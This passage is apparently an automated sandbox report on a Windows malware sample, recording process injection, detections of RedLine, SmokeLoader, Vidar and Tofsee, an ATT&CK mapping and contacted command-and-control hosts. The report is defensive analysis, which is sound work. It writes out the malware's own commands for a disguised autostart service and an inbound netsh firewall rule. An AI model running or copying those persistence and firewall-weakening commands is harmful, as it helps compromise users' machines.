                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.0.3BC6.exe.650000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.2.3BC6.exe.650000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.0.3BC6.exe.650000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Process created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Process created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                      Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                      Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Process created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ffiawxs
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Process created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.256399873.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.282787344.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.290821286.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.273349889.00000000089FF000.00000004.00000001.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000005.00000000.249728645.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.262413005.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.278743896.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exe Code function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3BC6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_00419EB2 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

                      Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000C.00000002.534608363.000001ECC9E3D000.00000004.00000001.sdmp | Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000C.00000002.534822144.000001ECC9F02000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.534608363.000001ECC9E3D000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match | File source: 30.2.3BC6.exe.3aaf910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.0.3BC6.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.0.3BC6.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.0.3BC6.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.3BC6.exe.3aaf910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.0.3BC6.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.2.3BC6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.0.3BC6.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000000.407524125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000000.408441992.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.429951321.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000000.408078077.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 19.1.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OG9rNsihJ7.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.BFBD.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.1.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.vfgiwcs.6415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match | File source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.357794608.000000000081A000.00000004.00000020.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match | File source: 42.2.xqfkdfcl.exe.840000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.xqfkdfcl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 44.2.svchost.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.3136.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.3136.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.xqfkdfcl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.xqfkdfcl.exe.680e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.3.xqfkdfcl.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 44.2.svchost.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.xqfkdfcl.exe.840000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.3136.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.3136.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 3136.exe PID: 5060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xqfkdfcl.exe PID: 5432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3440, type: MEMORYSTR
Source: Yara match | File source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

Yara detected RedLine Stealer, Yara detected SmokeLoader, Yara detected Vidar stealer, Yara detected Tofsee
Source: Yara match | File source: the same unpacked PE, memory dump and process memory space sources listed for these four signatures under Stealing of Sensitive Information above
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Code function: 29_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

MITRE ATT&CK Matrix

The matrix is listed per tactic column. Digits in parentheses are the report's match-count badges, reproduced as extracted.

Initial Access: Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain, Compromise Hardware Supply Chain
Execution: Windows Management Instrumentation (1), Native API (531), Exploitation for Client Execution (1), Command and Scripting Interpreter (3), Service Execution (3), Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell, Visual Basic
Persistence: DLL Side-Loading (1), Valid Accounts (1), Windows Service (14), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
Privilege Escalation: DLL Side-Loading (1), Valid Accounts (1), Access Token Manipulation (1), Windows Service (14), Process Injection (713), Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
Defense Evasion: Disable or Modify Tools (311), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), Software Packing (43), Timestomp (1), DLL Side-Loading (1), File Deletion (1), Masquerading (131), Valid Accounts (1), Access Token Manipulation (1), Virtualization/Sandbox Evasion (241), Process Injection (713), Hidden Files and Directories (1)
Credential Access: Input Capture (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging, GUI Input Capture
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (237), Query Registry (1), Security Software Discovery (581), Process Discovery (2), Virtualization/Sandbox Evasion (241), Application Window Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), Local Groups, Domain Groups
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media, Component Object Model and Distributed COM, Exploitation of Remote Services
Collection: Archive Collected Data (11), Input Capture (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture, Email Collection
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB, Commonly Used Port
Command and Control: Web Service (11), Ingress Tool Transfer (14), Encrypted Channel (22), Non-Standard Port (1), Non-Application Layer Protocol (4), Application Layer Protocol (35), Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS, Proxy
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

Behavior Graph

Behavior Graph ID: 553412 | Sample: OG9rNsihJ7.exe | Start date: 14/01/2022 | Architecture: WINDOWS | Score: 100

Process tree reconstructed from the graph's node labels and edges (the rendered graph is not reproduced; "badge" numbers are the counters shown on the node):

Start (sample)
  DNS/IP: transfer.sh; raw.githubusercontent.com; 8 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Antivirus detection for dropped file; 19 other signatures
  OG9rNsihJ7.exe (started)
    Signatures: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
    OG9rNsihJ7.exe (started)
      Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
      explorer.exe (injected; badge 12)
        DNS/IP: host-data-coin-11.com; 185.233.81.115, port 443, local port 49785, SUPERSERVERSDATACENTERRU, Russian Federation; 11 other IPs or domains
        Dropped: C:\Users\user\AppData\Roaming\vfgiwcs (PE32); C:\Users\user\AppData\Local\Temp\FC2A.exe (PE32); C:\Users\user\AppData\Local\Temp\BFBD.exe (PE32); 15 other malicious files
        Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
        254E.exe (started)
          Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); 4 other signatures
        3136.exe (started; badge 2)
          Dropped: C:\Users\user\AppData\Local\...\xqfkdfcl.exe (PE32)
          Signatures: Machine Learning detection for dropped file; Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall
          cmd.exe (started)
            Dropped: C:\Windows\SysWOW64\...\xqfkdfcl.exe (copy) (PE32)
            conhost.exe (started)
          cmd.exe (started)
            conhost.exe (started)
          sc.exe (started)
            conhost.exe (started)
          3 other processes
            conhost.exe (started); conhost.exe (started); conhost.exe (started)
        BFBD.exe (started)
          BFBD.exe (started)
            Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
          svchost.exe (started)
        2 other processes
          Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes
          WerFault.exe (started; badges 23, 9)
            DNS/IP: 192.168.2.1
          3BC6.exe (started)
  xqfkdfcl.exe (started)
    Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; Allocates memory in foreign processes
    svchost.exe (started)
      DNS/IP: microsoft-com.mail.protection.outlook.com 40.93.207.0, port 25, local port 49821, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; patmushta.info 94.142.143.116, port 443, local port 49823, IHOR-ASRU, Russian Federation
      Signatures: System process connects to network (likely due to code injection or exploit)
  vfgiwcs (started)
    Signatures: Machine Learning detection for dropped file
    vfgiwcs (started)
      Signatures: Creates a thread in another existing process (thread injection)
  10 other processes
    DNS/IP: 127.0.0.1
    Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
    WerFault.exe (started)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
